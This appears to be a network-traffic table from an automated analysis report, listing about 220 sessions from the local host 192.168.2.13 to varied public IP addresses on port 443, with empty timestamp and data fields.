                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19723192.168.2.1357772110.60.205.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19724192.168.2.1359118131.105.16.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19725192.168.2.1355348218.161.161.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19726192.168.2.1341440150.43.254.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19727192.168.2.134946681.91.71.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19728192.168.2.1338148166.178.23.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19729192.168.2.1350846196.145.207.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19730192.168.2.135903470.172.237.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19731192.168.2.1336962208.11.205.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19732192.168.2.1352350184.86.210.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19733192.168.2.135697293.75.243.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19734192.168.2.133553220.141.52.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19735192.168.2.134308843.26.89.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19736192.168.2.135091681.177.81.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19737192.168.2.1335638142.83.133.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19738192.168.2.1347170205.124.132.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19739192.168.2.1353086156.247.116.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19740192.168.2.13522948.142.177.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19741192.168.2.1336248223.203.72.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19742192.168.2.1336012197.227.106.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19743192.168.2.135284880.5.126.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19744192.168.2.134594624.194.134.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19745192.168.2.1350272155.103.158.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19746192.168.2.1333890169.24.96.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19747192.168.2.135942865.3.51.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19748192.168.2.1344418124.246.176.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19749192.168.2.1340152160.236.227.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19750192.168.2.1335134202.250.12.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19751192.168.2.1355916131.119.163.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19752192.168.2.133375688.225.50.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19753192.168.2.133802878.241.224.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19754192.168.2.1344932133.168.242.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19755192.168.2.134805288.159.22.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19756192.168.2.1352030184.219.216.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19757192.168.2.1358138185.144.231.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19758192.168.2.134245089.98.93.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19759192.168.2.1337052115.73.191.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19760192.168.2.1357424128.235.60.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19761192.168.2.135169461.187.192.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19762192.168.2.1339778181.136.104.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19763192.168.2.1343006185.240.173.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19764192.168.2.135797214.247.155.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19765192.168.2.134500661.239.107.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19766192.168.2.1356934100.41.131.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19767192.168.2.135436260.208.218.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19768192.168.2.133878039.97.199.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19769192.168.2.134687084.102.175.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19770192.168.2.1359842194.110.205.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19771192.168.2.134127873.30.157.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19772192.168.2.133777460.169.47.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19773192.168.2.1357002121.212.28.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19774192.168.2.133856849.111.23.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19775192.168.2.1347036124.148.37.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19776192.168.2.135998842.244.2.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19777192.168.2.134951647.3.241.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19778192.168.2.1335288170.36.190.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19779192.168.2.1351690125.98.109.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19780192.168.2.134349664.161.26.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19781192.168.2.135310638.111.37.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19782192.168.2.1349884162.10.210.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19783192.168.2.13552141.72.201.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19784192.168.2.1343532157.168.181.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19785192.168.2.136090881.84.163.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19786192.168.2.1359008174.85.178.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19787192.168.2.136004677.138.78.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19788192.168.2.134831099.106.156.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19789192.168.2.1353030189.251.157.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19790192.168.2.1353756162.50.243.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19791192.168.2.135998683.30.250.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19792192.168.2.135937239.51.187.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19793192.168.2.1359836186.223.139.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19794192.168.2.1345438162.117.113.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19795192.168.2.1348300132.142.167.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19796192.168.2.1333178169.235.63.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19797192.168.2.133660087.1.249.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19798192.168.2.1356778174.174.51.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19799192.168.2.134724423.164.211.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19800192.168.2.1352940121.95.159.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19801192.168.2.1357298179.198.155.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19802192.168.2.134357459.245.177.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19803192.168.2.1350484123.163.93.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19804192.168.2.1351276199.122.95.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19805192.168.2.1335484105.252.185.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19806192.168.2.1348374119.243.14.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19807192.168.2.134064838.202.194.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19808192.168.2.1351968156.211.200.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19809192.168.2.1334396115.92.79.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19810192.168.2.133943018.104.179.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19811192.168.2.134853087.32.61.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19812192.168.2.134322060.128.45.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19813192.168.2.134242257.131.174.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19814192.168.2.1333214132.169.116.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19815192.168.2.1356740218.172.195.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19816192.168.2.13538148.72.20.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19817192.168.2.134462651.244.204.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19818192.168.2.1332994120.17.223.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19819192.168.2.1338100200.187.252.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19820192.168.2.135111065.158.22.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19821192.168.2.1353688111.135.227.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19822192.168.2.1345248159.205.218.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19823192.168.2.134519062.106.195.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19824192.168.2.136047212.6.186.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19825192.168.2.1334590164.100.192.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19826192.168.2.135057834.50.249.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19827192.168.2.1343876161.202.170.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19828192.168.2.1332972180.9.21.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19829192.168.2.1348070143.71.90.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19830192.168.2.1352570128.103.220.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19831192.168.2.134722619.127.122.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19832192.168.2.1337114206.179.216.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19833192.168.2.135344479.154.129.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19834192.168.2.134860691.157.66.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19835192.168.2.1347116107.175.57.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19836192.168.2.135610276.250.101.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19837192.168.2.1333774134.96.231.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19838192.168.2.1338762198.211.58.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19839192.168.2.1354542148.129.239.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19840192.168.2.1348522138.96.134.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19841192.168.2.13531508.232.30.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19842192.168.2.1356346171.143.202.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19843192.168.2.133803086.5.89.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19844192.168.2.134026847.168.65.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19845192.168.2.134051867.57.198.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19846192.168.2.1348778166.77.63.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19847192.168.2.1341356182.88.205.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19848192.168.2.1343518168.93.22.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19849192.168.2.1343626171.222.165.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19850192.168.2.1334510119.10.200.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19851192.168.2.1333460123.132.73.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19852192.168.2.134114083.91.78.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19853192.168.2.1339610100.167.197.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19854192.168.2.135031065.55.28.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19855192.168.2.133908695.160.211.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19856192.168.2.1343700136.85.20.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19857192.168.2.1347972148.69.48.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19858192.168.2.134847873.202.20.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19859192.168.2.1349384183.157.82.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19860192.168.2.13538821.178.180.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19861192.168.2.1337870125.242.198.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19862192.168.2.1348576128.155.214.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19863192.168.2.1338062221.92.212.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19864192.168.2.134414232.139.91.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19865192.168.2.135855867.134.116.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19866192.168.2.1356600178.234.28.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19867192.168.2.1357180108.240.118.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19868192.168.2.133814234.4.179.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19869192.168.2.1334620180.46.0.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19870192.168.2.13596368.197.70.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19871192.168.2.1360068124.124.9.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19872192.168.2.1336828137.36.218.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19873192.168.2.135403431.34.194.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19874192.168.2.1359262192.249.248.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19875192.168.2.134929865.80.17.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19876192.168.2.133351836.181.151.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19877192.168.2.135099484.170.115.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19878192.168.2.135516480.211.222.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19879192.168.2.1350004152.219.211.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19880192.168.2.135801287.217.146.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19881192.168.2.1360688222.195.77.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19882192.168.2.133298014.12.61.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19883192.168.2.1350670194.87.47.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19884192.168.2.135977025.197.173.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19885192.168.2.1335136151.26.173.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19886192.168.2.1334482157.25.31.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19887192.168.2.1348554116.20.19.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19888192.168.2.134562086.172.178.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19889192.168.2.1342396161.110.42.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19890192.168.2.1343448111.37.219.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19891192.168.2.1351468219.241.192.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19892192.168.2.134723061.201.94.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19893192.168.2.1343218112.121.172.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19894192.168.2.13504742.27.196.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19895192.168.2.1335968153.198.44.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19896192.168.2.1348948137.101.50.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19897192.168.2.1333110222.177.34.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19898192.168.2.134115454.157.28.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19899192.168.2.135937634.174.89.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19900192.168.2.1335172160.121.37.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19901192.168.2.1335030144.122.38.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19902192.168.2.13426424.147.115.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19903192.168.2.1341710112.244.27.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19904192.168.2.135835071.102.51.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19905192.168.2.1334592193.134.235.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19906192.168.2.1350236135.244.124.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19907192.168.2.1348618138.42.5.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19908192.168.2.1354482128.32.173.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19909192.168.2.1349312168.82.48.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19910192.168.2.1333520206.6.142.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19911192.168.2.133855445.176.222.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19912192.168.2.134117887.49.129.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19913192.168.2.1348988189.160.65.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19914192.168.2.1360646222.212.88.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19915192.168.2.134119240.229.205.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19916192.168.2.1346530175.53.165.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19917192.168.2.133953068.155.16.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19918192.168.2.1338562185.34.204.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19919192.168.2.1346192156.100.189.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19920192.168.2.135529888.203.58.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19921192.168.2.1353040133.203.163.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19922192.168.2.133703825.172.110.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19923192.168.2.1340816110.83.177.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19924192.168.2.1344482155.17.102.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19925192.168.2.135240037.18.103.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19926192.168.2.134603438.95.24.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19927192.168.2.133624658.238.227.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19928192.168.2.1347202216.42.127.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19929192.168.2.133348471.216.201.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19930192.168.2.135422461.41.112.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19931192.168.2.1345290190.110.131.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19932192.168.2.1341838219.96.120.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19933192.168.2.133551219.3.192.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19934192.168.2.1340350175.1.251.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19935192.168.2.135373692.77.54.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19936192.168.2.1345800103.3.39.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19937192.168.2.134088059.24.91.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19938192.168.2.1344806130.233.197.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19939192.168.2.134990231.38.137.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19940192.168.2.134594424.90.247.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19941192.168.2.136081045.1.30.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19942192.168.2.133982057.236.213.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19943192.168.2.1344324174.105.44.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19944192.168.2.1352156201.132.49.115443
                                                TimestampBytes transferredDirectionData


